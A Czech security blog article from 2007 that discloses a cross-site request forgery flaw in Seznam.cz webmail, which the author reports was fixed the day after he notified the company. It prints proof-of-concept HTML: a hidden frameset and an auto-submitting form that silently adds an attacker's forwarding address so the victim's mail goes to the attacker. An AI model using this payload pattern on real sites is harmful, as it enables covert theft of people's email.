Uživatelé SEZNAM.CZ v ohrožení

Autor: .cCuMiNn.

13.2.2007

Máte svůj e-mailový účet veden na Seznam.cz a máte pocit bezpečí? Možná se po přečtení tohoto článku už tak bezpečně cítit nebudete :)

Trojské koně na webu jsou velice choulostivou záležitostí, jejíž hrozbu si tvůrci webových aplikací buď nepřipouští nebo o ní nedej bože nevědí a tak můžete zranitelnost tohoto typu nalézt na mnoha webových stránkách. Napadlo mě prověřit si zabezpečení našeho největšího a nejznámějšího poskytovatele freemailových účtů společnost Seznam.cz. K mému údivu trpí webové rozhraní pro přístup k e-mailovým zprávám naprosto banální chybou, díky níž si uživatelé této služby nemohou být v žádném případě jisti svým soukromím. V krátkosti se vás nyní pokusím seznámit s touto konkrétní chybou, kterou jsem na Seznam.cz objevil.

Chyba se nachází v sekci nastavení účtu, kde si můžete zřídit přesměrování příchozích e-mailů do jiné e-mailové schránky. Útočníkovi stačí, když své oběti zašle e-mail s odkazem na www stránku, kde bude čekat zákeřný kód. Po kliknutí na takový odkaz se kód sám postará o vložení e-mailové adresy do tohoto seznamu.

Kód čekající na útočníkově stránce by mohl vypadat takto:

<html><head></head> <frameset cols="0, *"> <frame src="http://www.utocnik.cz/seznam.html"> <frame src="http://www.soom.cz"> </frameset> </html>

A zdrojový kód stránky seznam.html by mohl být takovýto:

<html><head></head><body> <form name="fakeform" action="http://email.seznam.cz/forwardProcess" method="post"> <input type="hidden" name="sessionId" value=""> <input type="hidden" name="filterId" value="-1"> <input type="hidden" name="actionType" value=""> <input type="hidden" name="actionValue1" value="fake@domena.cz"> </form> <script type="text/javascript">document.fakeform.submit()</script> </body></html>

Oběti se po kliknutí na odkaz zobrazí stránka WWW.SOOM.CZ, která jí byla odesilatelem e-mailu doporučena. Na pozadí však útočník naprosto nepozorovaně vložil svou adresu do nastavení účtu oběti a veškerá příchozí pošta, která od této chvíle oběti přijde, bude přeposílána na útočníkův e-mail.

Co mě zarazilo u tak velké a známé společnosti, jakou Seznam.cz bezpochyby je, byla skutečnost, že nekontroluje hodnotu referer a přijímá tak požadavky přicházející odkudkoli. Ne, že by to na celé věci něco měnilo, protože i tato hodnota se dá spoofovat, ale byla by vidět alespoň snaha. Takhle je pouze vidět, že si o naše soukromí nikdo žádné velké starosti nedělá.

Ve stejnou chvíli, kdy uveřejňuji tento článek, zasílám oznámení o chybě i administrátorům společnosti Seznam.cz a jsem zvědav, jak dlouho jim bude náprava trvat.

---

Druhý den po odhalení chyby byly ze strany společnosti Seznam.cz učiněny kroky, směřující k opravě popsané chyby. Dnes již není možné touto cestou ohrozit soukromí uživatelů, za což lidem ze Seznam.cz děkujeme.